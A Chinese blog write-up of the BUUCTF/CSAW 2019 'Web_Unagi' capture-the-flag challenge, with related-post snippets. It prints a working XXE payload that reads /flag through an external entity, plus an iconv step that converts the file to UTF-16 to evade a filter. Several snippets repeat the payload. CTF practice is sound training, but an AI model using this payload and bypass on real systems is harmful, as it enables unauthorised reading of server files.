BUUCTF--[CSAWQual 2019]Web_Unagi

最新推荐文章于 2024-03-07 07:00:00 发布
最新推荐文章于 2024-03-07 07:00:00 发布
阅读量313 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119010517
版权

进入页面后看到一个Upload

 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为

给出提示flag在/flag中,所以构造出的payload为

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

直接上传发现给出提示

所以这里我们要通过XXE编码转换成utf-16编码绕过

iconv -f utf8 -t utf-16 t1.xml>t2.xml

 成功拿到flag

漏洞点相似:BUUCTF--[BSidesCF 2019]SVGMagic

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF工具合集
04-09
CTF工具合集包括了CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛
NSSCTF web 刷题记录1
rev1ve的博客
09-04 1648
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
[CSAWQual 2019]Web_Unagi ---不会编程的崽
最新发布
不会编程的崽的博客
03-07 479
xxe编码绕过
BUUCTF(11.14-11.22)
qq_52988816的博客
11-22 1664
记:上周抽空刷的BUU题目,记录一下解题过程的同时与大家分享交流 [Zer0pts2020]Can you guess it? 一个查询页面,提交东西提示wrong 有个源码链接,我们点开看一下 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you ar
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 223
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 990
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
BUUCTF [CSAWQual 2019]Web_Unagi 1
weixin_45642610的博客
09-09 489
BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式 直接用之前xml注入的上传即可。 改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx
BUUCTF [CSAWQual 2016] i_got_id
snowlyzz的博客
09-02 212
perl CGI
[CSAWQual 2019]Web_Unagi
shinygod的博客
04-15 578
知识点:xxe外部实体注入和绕过waf 告诉我们要传一个xml文件,并且相应的样式信息也出来了。 flag在/flag下 构造xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>gg</username> <pa
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1866
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
CSAW2017_CTF_Web_Writeup
dengzhasong7076的博客
09-18 252
前言 还比较忙,还有题目得明天跟一下。 orange 系列 v1 http://web.chal.csaw.io:7311/?path=orange.txt v3 http://web.chal.csaw.io:7312/?path=orange.txt 说实话是比较迷的,因为有意外解,导致他开始是400分,后面变成100分,最后出v3版本才是300分。 不过考点是nodejs常用的一个...
论文研究-一种基于关键非功能需求的软件可信性度量模型.pdf
07-22
为了更为合理准确地度量软件可信性,提出了一种基于关键非功能需求的软件可信性度量模型。首先,分析了该模型所涉及的软件可信性、非功能需求、关键非功能需求的定义;其次,对非功能需求进行分解以及权重的分配,并将非功能需求细分为A、B、C、D四类以便更好地获取;最后,应用Web软件中的“在线旅行”网站详细阐述了该模型的具体度量过程。提出的模型是一个通用的软件可信性度量模型,适用于不同形态的软件,支持软件可信性的定制,对于软件可信性的度量具有一定的指导意义。
-Unagi-Ingress-Hackathon
02-14
-Unagi-Ingress-Hackathon
unliftio-messagebox:快速可靠的消息队列
05-10
基于unliftio unagi-chan子集的薄包装纸。 该项目中的单元测试和基准测试锻炼了unagi-chan ,因此希望该库的用户不必为此担心。 该项目还旨在隐式验证unagi-chan某些部分。 总体目标是即使在大量并发程序中也可以...
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
乌纳吉(ウナギ) 除了是世界上最美味的鱼的一个, unagi还可以帮助您通过浏览或了Hyper Suprime-CAM(HSC)斯巴鲁战略...2019/06/03:添加了对HSC PDR2的支持(需要更多测试) PDR2_DUD和PDR2_WIDE重新运行中的所有
Python库 | unagi-0.1.3.dev3.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:unagi-0.1.3.dev3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
unagi-chan:haskell库,使用类似于Chan的API为x86实现快速且可扩展的并发队列
02-04
unagi-chan:haskell库,使用类似于Chan的API为x86实现快速且可扩展的并发队列
七月刷题总结
qq_46263951的博客
07-30 446
本月在BUUCTF平台共刷400解以下题40道,通过刷题学到了很多知识和思路,以下将会把在每道题中学到的知识列举出来,也方便之后的复习。 BUUCTF--BUU UPLOAD COURSE 1 文件上传,通过测试是一个文件包含漏洞,即使后缀名被更改,php代码依然可以被执行。 BUUCTF--[watevrCTF-2019]Cookie Store Cookie中包含着我们的信息,更改Cookie中的金额即可。 这里可以做一个小结:一般需要我们购买但钱又不够的情况下,考点基本上就在于怎么来找到包含金.
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1252
alice passwd1 Alice [email protected] CSAW2019 bob passwd2 Bob [email protected]
[CSAWQual 2019]Unagi
07-27
- *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.csdn.net/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值